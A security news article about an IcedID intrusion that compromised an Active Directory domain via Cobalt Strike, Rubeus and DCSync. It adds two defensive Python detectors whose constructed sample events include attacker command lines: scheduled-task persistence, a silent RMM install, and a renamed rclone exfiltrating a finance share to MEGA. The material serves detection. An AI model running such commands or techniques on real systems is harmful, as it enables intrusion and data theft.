Active Directory Domain Compromised in Under 24 Hours

A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access.

IcedID, also known as BokBot, started as a banking trojan in 2017 before evolving into a dropper for other malware, joining the likes of Emotet, TrickBot, Qakbot, Bumblebee, and Raspberry Robin.

Attacks delivering IcedID have leaned on a variety of lures and container formats, especially since Microsoft began blocking macros in Office files downloaded from the web.

The intrusion in question follows that pattern: the infection chain begins with an ISO image delivered inside a ZIP archive and culminates in the execution of the IcedID payload. ISO containers were popular with droppers in this period because files extracted from a mounted image did not carry the Mark-of-the-Web that triggers SmartScreen and the macro block.

The malware then establishes persistence on the host via a scheduled task. It communicates with its command-and-control server to download additional payloads, including a Cobalt Strike Beacon, which is used for follow-on reconnaissance.

The operator then moves laterally across the network, executing the same Cobalt Strike Beacon on each workstation reached and installing the Atera agent, a legitimate remote monitoring and management (RMM) tool, as a redundant remote access mechanism.

Utilizing IT tools like this allows attackers to create an additional ‘backdoor’ for themselves if their initial persistence mechanisms are discovered and remediated. These tools are less likely to be detected by antivirus or EDR and more likely to be written off as false positives.

Source: Cybereason

The Cobalt Strike Beacon is further used as a conduit to download Rubeus, an open-source C# toolkit for Kerberos abuse, for credential theft, ultimately permitting the threat actor to move laterally to a Windows Server with domain admin privileges.

The elevated permissions are then weaponized to stage a DCSync attack: the adversary uses the directory replication service (DRSUAPI) to request account secrets from a domain controller (DC) as if it were another DC replicating the directory, retrieving password hashes, including the krbtgt account's, without touching NTDS.dit on disk. Domain admins hold the replication rights this requires, which is why the attack needs no exploit once those privileges are obtained.
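A DCSync request leaves a trace that defenders can hunt for: when directory auditing is enabled, the DC logs Security Event ID 4662 with the control-access-right GUIDs for DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2), DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) and, for RODC filtered attributes, DS-Replication-Get-Changes-In-Filtered-Set (89e95b76-444d-4c62-991a-0facbeda640c). The following detector is an added example written for this page, not code from Cybereason's or THN's reporting. The event records and the allow-list of known replicators (DC machine accounts and an Azure AD Connect account) are constructed for illustration; a real pipeline would read the same fields from a SIEM or Get-WinEvent.

```python
# Added example: flag DCSync-style replication requests in Windows Security
# Event ID 4662 records. Not from the reports this page summarises.
import re

# Control-access rights that directory replication requires. Get-Changes-All
# is the one that returns secrets (password hashes), so it is the key signal.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
DS_CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in AccessMask

# Constructed allow-list (assumption): accounts that legitimately replicate.
# Use an explicit list rather than "name ends with $" so a rogue computer
# account requesting replication still alerts.
KNOWN_REPLICATORS = {"DC01$", "DC02$", "MSOL_a1b2c3d4e5f6"}

# Constructed 4662 records in the field layout Windows uses. The Properties
# field lists the GUIDs of the rights exercised, one per brace group.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "MSOL_a1b2c3d4e5f6", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x20",
     "Properties": "{bf967a7f-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4662, "SubjectUserName": "WS07$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def replication_rights(properties):
    """Names of replication rights present in a 4662 Properties field."""
    return [REPLICATION_GUIDS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_GUIDS]


def dcsync_alert(event, known_replicators):
    """Return the replication rights an unexpected principal exercised, else []."""
    if event.get("EventID") != 4662:
        return []
    try:
        mask = int(event.get("AccessMask", "0"), 16)
    except ValueError:
        return []
    if not mask & DS_CONTROL_ACCESS:
        return []  # not a control-access check, so not replication
    rights = replication_rights(event.get("Properties", ""))
    if not rights:
        return []
    if event.get("SubjectUserName", "") in known_replicators:
        return []  # a DC or sync account doing its job
    return rights


def scan(events, known_replicators):
    """(principal, rights) for every event that looks like DCSync."""
    hits = []
    for ev in events:
        rights = dcsync_alert(ev, known_replicators)
        if rights:
            hits.append((ev["SubjectUserName"], rights))
    return hits


if __name__ == "__main__":
    for user, rights in scan(SAMPLE_EVENTS, KNOWN_REPLICATORS):
        print(f"DCSync suspected: {user} exercised {', '.join(rights)}")
```

The detector deliberately alerts on the workstation account WS07$ even though it is a machine account: an adversary who has obtained replication rights for any principal, computer or user, can run DCSync with it, so the exclusion must be a maintained list of the domain's real DCs and sync accounts, not a naming heuristic. Tighter production rules additionally require the ObjectType to be the domain naming context.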

Other tools used as part of the attack include a legitimate utility named netscan.exe to scan the network for lateral movement targets, and the rclone file-syncing software to exfiltrate directories of interest to the MEGA cloud storage service.
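The scheduled-task persistence, the Atera installation and the netscan and rclone usage described above all show up as process creations, so one triage pass over process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command-line auditing) covers them. The rule set below is an added example written for this page, not tooling from the reports it summarises. The five event records are constructed, the Atera install path and MSI name are assumptions, and the rclone remote name "mega" is illustrative. The rclone rule checks Sysmon's OriginalFileName as well as the on-disk name because operators routinely rename the binary.

```python
# Added example: triage process-creation events for the tooling described on
# this page. Event records below are constructed; Atera path/MSI name assumed.
import re
import shlex
from pathlib import PureWindowsPath

USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# An rclone remote looks like "name:path". Requiring two or more characters
# before the colon and no backslash after it keeps "C:\..." from matching.
REMOTE = re.compile(r"^[A-Za-z0-9_-]{2,}:(?!\\)")

SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": 'schtasks.exe /create /tn "Update Check" /sc minute /mo 30 '
                    '/tr "rundll32.exe C:\\Users\\jdoe\\AppData\\Roaming\\update.dll,init"'},
    {"Image": "C:\\Windows\\System32\\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": "msiexec.exe /i C:\\Users\\jdoe\\Downloads\\AteraAgent.msi /qn"},  # assumed name
    {"Image": "C:\\Users\\jdoe\\Desktop\\netscan.exe", "OriginalFileName": "netscan.exe",
     "CommandLine": "netscan.exe /hide /auto:scan.xml /range:10.0.0.1-10.0.3.254"},
    {"Image": "C:\\ProgramData\\svchost.exe", "OriginalFileName": "rclone.exe",  # renamed rclone
     "CommandLine": 'svchost.exe copy "C:\\Shares\\Finance" mega:backup --max-age 90d --transfers 16'},
    {"Image": "C:\\Windows\\System32\\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},  # benign control
]


def image_name(ev):
    return PureWindowsPath(ev["Image"]).name.lower()


def tokens(ev):
    """Split a Windows command line without treating backslashes as escapes."""
    try:
        return [t.lower() for t in shlex.split(ev["CommandLine"], posix=False)]
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        return ev["CommandLine"].lower().split()


def rule_schtasks_persistence(ev):
    if image_name(ev) != "schtasks.exe":
        return None
    cl = ev["CommandLine"].lower()
    if "/create" in cl and any(p in cl for p in USER_WRITABLE):
        return "scheduled task created with action in user-writable path"
    return None


def rule_rmm_install(ev):
    blob = (ev["Image"] + " " + ev["CommandLine"]).lower()
    if "ateraagent" in blob or "atera networks" in blob:
        return "Atera agent install or launch"
    return None


def rule_netscan(ev):
    if image_name(ev) == "netscan.exe" or ev.get("OriginalFileName", "").lower() == "netscan.exe":
        return "netscan.exe network scanner"
    return None


def rule_rclone_exfil(ev):
    is_rclone = "rclone" in image_name(ev) or ev.get("OriginalFileName", "").lower() == "rclone.exe"
    if not is_rclone:
        return None
    toks = tokens(ev)
    if "config" in toks and "create" in toks:
        return "rclone remote configured"
    if RCLONE_VERBS & set(toks):
        remotes = [t for t in toks if REMOTE.match(t)]
        if remotes:
            return "rclone upload to remote " + remotes[0].split(":")[0]
    return None


RULES = (rule_schtasks_persistence, rule_rmm_install, rule_netscan, rule_rclone_exfil)


def triage(events):
    """(index, image, [matched rule descriptions]) for every event that hits."""
    hits = []
    for i, ev in enumerate(events):
        matched = [m for m in (r(ev) for r in RULES) if m]
        if matched:
            hits.append((i, ev["Image"], matched))
    return hits


if __name__ == "__main__":
    for i, image, matched in triage(SAMPLE_EVENTS):
        print(f"[{i}] {image}: {'; '.join(matched)}")
```

Each rule is a cheap string check, and that is the point: the tools in this intrusion are legitimate and signed, so the signal is not the binary but its context, a task action under AppData, an RMM agent the organisation never licensed, a scanner on a user's desktop, or a copy to a cloud remote from a file server share.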

The findings come as researchers from Team Cymru shed more light on the BackConnect (BC) protocol used by IcedID to deliver additional functionality post-compromise, including a VNC module that provides a remote-access channel.

“In the case of BC, there appear to be two operators managing the overall process within distinct roles,” the researchers noted last month, adding “much of the activity occurs during the typical working week.”

The development also follows a report from Proofpoint in November 2022 that a resurgence in Emotet activity has been linked to the distribution of a new version of IcedID.

Source: THN, Cybereason